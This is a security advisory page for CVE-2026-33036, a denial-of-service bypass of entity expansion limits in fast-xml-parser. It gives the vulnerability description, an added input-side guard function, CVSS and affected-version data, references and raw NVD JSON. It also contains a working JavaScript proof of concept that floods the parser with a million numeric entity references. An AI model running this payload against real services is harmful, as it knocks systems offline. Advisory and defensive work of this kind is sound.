Security Vulnerability Report
CVE-2026-33036 (CVSS 7.5, HIGH)

Published: 2026-03-20 06:16:12
Last Modified: 2026-03-23 16:28:11

Description

fast-xml-parser allows users to process XML from a JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (&#NNN;, &#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities, while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like &#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process, even when developers have configured strict limits. This issue has been fixed in version 5.5.6.
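Because the description says the parser's own counter only covers DOCTYPE-defined entities, a stopgap for deployments that cannot upgrade yet is to apply an equivalent budget on the input side, before the document reaches XMLParser. The following is an added example, not fast-xml-parser's own code; the function and constant names and the limit values are assumptions for illustration.

```javascript
// Added example (not fast-xml-parser's own code): an input-side budget for the
// references the description says the parser does not count. The function and
// constant names are assumptions chosen for illustration.
// Matches &#NNN;, &#xHH; and the five predefined XML entities.
const ENTITY_RE = /&(#x[0-9a-fA-F]+|#[0-9]+|amp|lt|gt|quot|apos);/g;
const STANDARD_ENTITY_LENGTH = { amp: 1, lt: 1, gt: 1, quot: 1, apos: 1 };

// Scans the raw XML once, counting references and the characters they would
// expand to; bails out as soon as either budget is exceeded, so an oversized
// payload is rejected without ever being materialised.
function checkEntityBudget(xml, { maxTotalExpansions, maxExpandedLength }) {
  let count = 0;
  let expanded = 0;
  ENTITY_RE.lastIndex = 0;
  let m;
  while ((m = ENTITY_RE.exec(xml)) !== null) {
    count += 1;
    const ref = m[1];
    if (ref.startsWith("#")) {
      const cp = ref[1] === "x" ? parseInt(ref.slice(2), 16) : parseInt(ref.slice(1), 10);
      if (!Number.isFinite(cp) || cp > 0x10ffff) {
        return { ok: false, reason: "invalid code point", count, expanded };
      }
      expanded += cp > 0xffff ? 2 : 1; // UTF-16 code units, as String.length counts
    } else {
      expanded += STANDARD_ENTITY_LENGTH[ref];
    }
    if (count > maxTotalExpansions) {
      return { ok: false, reason: "too many entity references", count, expanded };
    }
    if (expanded > maxExpandedLength) {
      return { ok: false, reason: "expanded length too large", count, expanded };
    }
  }
  return { ok: true, reason: null, count, expanded };
}

// Run the guard first; only a document within budget reaches the real parser.
function parseIfWithinBudget(xml, limits, parse) {
  const verdict = checkEntityBudget(xml, limits);
  if (!verdict.ok) throw new Error(`rejected: ${verdict.reason} (${verdict.count} refs)`);
  return parse(xml);
}

// Constructed sample inputs: a benign document and a small-scale version of the
// pattern in the description (one element holding many &#65; references).
const LIMITS = { maxTotalExpansions: 1000, maxExpandedLength: 1000 };
const BENIGN_XML = "<root>Tom &amp; Jerry &#x41;&#66;</root>";
const FLOOD_XML = "<root>" + "&#65;".repeat(5000) + "</root>";
```

The regex also counts references inside comments and CDATA sections, so the guard errs toward rejecting; it is a stopgap, and upgrading to 5.5.6 remains the fix.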

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta5:*:*:*:*:*:* - VULNERABLE
fast-xml-parser >= 4.0.0-beta.3, <= 5.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const { XMLParser } = require("fast-xml-parser");

/**
 * PoC for CVE-2026-33036
 * Demonstrates bypassing entity expansion limits using numeric character references.
 */
function generatePayload(count) {
  let payload = "<root>";
  // Generating numeric character references which bypass maxTotalExpansions
  for (let i = 0; i < count; i++) {
    payload += "&#65;"; // 'A'
  }
  payload += "</root>";
  return payload;
}

const parser = new XMLParser({
  ignoreAttributes: true,
  // Strict limits intended to prevent DoS (Billion Laughs)
  maxTotalExpansions: 1000,
  maxExpandedLength: 1000
});

// Generate 1 million numeric entities
const maliciousXml = generatePayload(1000000);

console.time("Attack");
try {
  // Despite limits, this will cause high CPU/Memory usage
  const result = parser.parse(maliciousXml);
  console.log("Parsing finished. Result length:", result.root.length);
} catch (e) {
  console.error("Error:", e.message);
}
console.timeEnd("Attack");

References

https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01 (Patch)
https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6 (Product, Release Notes)
https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33036", "sourceIdentifier": "[email protected]", "published": "2026-03-20T06:16:11.630", "lastModified": "2026-03-23T16:28:10.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (&#NNN;, &#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like &#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6."}, {"lang": "es", "value": "fast-xml-parser permite a los usuarios procesar XML desde objetos JS sin bibliotecas basadas en C/C++ ni callbacks. Las versiones 4.0.0-beta.3 hasta la 5.5.5 contienen una vulnerabilidad de bypass donde las referencias de caracteres numéricos (&amp;#NNN;, &amp;#xHH;) y las entidades XML estándar evaden completamente los límites de expansión de entidades (p. ej., maxTotalExpansions, maxExpandedLength) añadidos para corregir CVE-2026-26278, lo que permite la denegación de servicio por expansión de entidades XML. La causa raíz es que replaceEntitiesValue() en OrderedObjParser.js solo aplica el conteo de expansión en entidades definidas en DOCTYPE, mientras que el bucle lastEntities que maneja las entidades numéricas/estándar no realiza ningún conteo. 
Un atacante que suministre 1M de referencias de entidades numéricas como A puede forzar una asignación de memoria de ~147MB y un uso intensivo de CPU, lo que podría bloquear el proceso, incluso cuando los desarrolladores han configurado límites estrictos. Este problema ha sido corregido en la versión 5.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-776"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.1", "versionEndExcluding": "5.5.6", "matchCriteriaId": "AB9177BC-BACD-4367-9063-398ACE2AB4A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "2398B145-2ED8-4197-8838-FAE7AD7666E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "44B6C4BE-69F4-4651-80EE-055D1F99F7EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "4B32E8C4-15A7-466D-98A7-9EDD6B45F883"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "23CDA792-75FA-48A7-8577-4266A0BFB3A7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta6:*:*:*:*:*:*", 
"matchCriteriaId": "D4B7FD7D-0059-4D5B-898D-539AB43AA24A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "42844DDE-AD5B-4684-8104-1C2D133C6098"}, {"vulnerable": true, "criteria": "cpe:2.3:a:naturalintelligence:fast-xml-parser:4.0.0:beta8:*:*:*:*:*:*", "matchCriteriaId": "C045B7F2-16A9-47C9-B08D-71847A940B93"}]}]}], "references": [{"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}